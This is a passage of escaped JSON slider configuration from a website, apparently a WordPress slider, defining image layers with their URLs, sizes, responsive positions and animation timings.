\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"2\":{\"text\":\"Image 2\",\"alias\":\"List\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic5-1.png\",\"imageId\":3262},\"size\":{\"width\":{\"d\":{\"v\":\"235px\",\"e\":true},\"n\":{\"v\":\"160px\",\"e\":true},\"t\":{\"v\":\"160px\",\"e\":true},\"m\":{\"v\":\"113px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"110px\",\"e\":true},\"n\":{\"v\":\"75px\",\"e\":true},\"t\":{\"v\":\"75px\",\"e\":true},\"m\":{\"v\":\"53px\",\"e\":true}},\"originalWidth\":235,\"originalHeight\":110,\"aspectRatio\":{\"d\":{\"v\":2.136363636363636242521124586346559226512908935546875},\"n\":{\"v\":2.136363636363636242521124586346559226512908935546875},\"t\":{\"v\":2.136363636363636242521124586346559226512908935546875},\"m\":{\"v\":2.136363636363636242521124586346559226512908935546875}}},\"position\":{\"x\":{\"d\":{\"v\":\"745px\",\"e\":true},\"n\":{\"v\":\"530px\",\"e\":true},\"t\":{\"v\":\"-36px\",\"e\":true},\"m\":{\"v\":\"170px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"357px\",\"e\":true},\"n\":{\"v\":\"270px\",\"e\":true},\"t\":{\"v\":\"197px\",\"e\":true},\"m\":{\"v\":\"181px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":710},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1360,\"start\":710,\"startRelative\":710},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1360,\"start\":710,\"startRelative\":710},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":930,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"3\":{\"text\":\"Image 3\",\"alias\":\"Image 3\",\"uid\":3,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic4.png\",\"imageId\":3263},\"size\":{\"width\":{\"d\":{\"v\":\"284px\",\"e\":true},\"n\":{\"v\":\"167px\",\"e\":true},\"t\":{\"v\":\"167px\",\"e\":true},\"m\":{\"v\":\"113px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"63px\",\"e\":true},\"n\":{\"v\":\"37px\",\"e\":true},\"t\":{\"v\":\"37px\",\"e\":true},\"m\":{\"v\":\"25px\",\"e\":true}},\"originalWidth\":284,\"originalHeight\":63,\"aspectRatio\":{\"d\":{\"v\":4.5079365079365079083117961999960243701934814453125},\"n\":{\"v\":4.5079365079365079083117961999960243701934814453125},\"t\":{\"v\":4.5079365079365079083117961999960243701934814453125},\"m\":{\"v\":4.5079365079365079083117961999960243701934814453125}}},\"position\":{\"x\":{\"d\":{\"v\":\"262px\",\"e\":true},\"n\":{\"v\":\"176px\",\"e\":true},\"t\":{\"v\":\"28px\",\"e\":true},\"m\":{\"v\":\"27px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"379px\",\"e\":true},\"n\":{\"v\":\"282px\",\"e\":true},\"t\":{\"v\":\"281px\",\"e\":true},\"m\":{\"v\":\"185px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":8,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1300,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1300,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1000,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"4\":{\"text\":\"Image 4\",\"alias\":\"Image 4\",\"uid\":4,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic6-1.png\",\"imageId\":3264},\"size\":{\"width\":{\"d\":{\"v\":\"257px\",\"e\":true},\"n\":{\"v\":\"165px\",\"e\":true},\"t\":{\"v\":\"165px\",\"e\":true},\"m\":{\"v\":\"92px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"28px\",\"e\":true},\"n\":{\"v\":\"18px\",\"e\":true},\"t\":{\"v\":\"18px\",\"e\":true},\"m\":{\"v\":\"10px\",\"e\":true}},\"originalWidth\":257,\"originalHeight\":28,\"aspectRatio\":{\"d\":{\"v\":9.1785714285714288251938342000357806682586669921875},\"n\":{\"v\":9.1785714285714288251938342000357806682586669921875},\"t\":{\"v\":9.1785714285714288251938342000357806682586669921875},\"m\":{\"v\":9.1785714285714288251938342000357806682586669921875}}},\"position\":{\"x\":{\"d\":{\"v\":\"29px\",\"e\":true},\"n\":{\"v\":\"-1px\",\"e\":true},\"t\":{\"v\":\"-139px\",\"e\":true},\"m\":{\"v\":\"-123px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"274px\",\"e\":true},\"t\":{\"v\":\"274px\",\"e\":true},\"m\":{\"v\":\"179px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":9,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":640},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1350,\"start\":640,\"startRelative\":640},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1350,\"start\":640,\"startRelative\":640},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":500,\"start\":3000,\"startRelative\":1010,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"5\":{\"text\":\"Image 5\",\"alias\":\"Image 5\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide2-graphic3-1.png\",\"imageId\":3265},\"size\":{\"width\":{\"d\":{\"v\":\"507px\",\"e\":true},\"n\":{\"v\":\"410px\",\"e\":true},\"t\":{\"v\":\"410px\",\"e\":true},\"m\":{\"v\":\"297px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"63px\",\"e\":true},\"n\":{\"v\":\"51px\",\"e\":true},\"t\":{\"v\":\"51px\",\"e\":true},\"m\":{\"v\":\"37px\",\"e\":true}},\"originalWidth\":507,\"originalHeight\":63,\"aspectRatio\":{\"d\":{\"v\":8.047619047619047449870777199976146221160888671875},\"n\":{\"v\":8.047619047619047449870777199976146221160888671875},\"t\":{\"v\":8.047619047619047449870777199976146221160888671875},\"m\":{\"v\":8.047619047619047449870777199976146221160888671875}}},\"position\":{\"x\":{\"d\":{\"v\":\"-70px\",\"e\":true},\"n\":{\"v\":\"-113px\",\"e\":true},\"t\":{\"v\":\"-169px\",\"e\":true},\"m\":{\"v\":\"-92px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"298px\",\"e\":true},\"n\":{\"v\":\"239px\",\"e\":true},\"t\":{\"v\":\"242px\",\"e\":true},\"m\":{\"v\":\"151px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":10,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":620},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1360,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power2.easeOut\",\"speed\":1360,\"start\":620,\"startRelative\":620},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3000,\"startRelative\":1020,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSp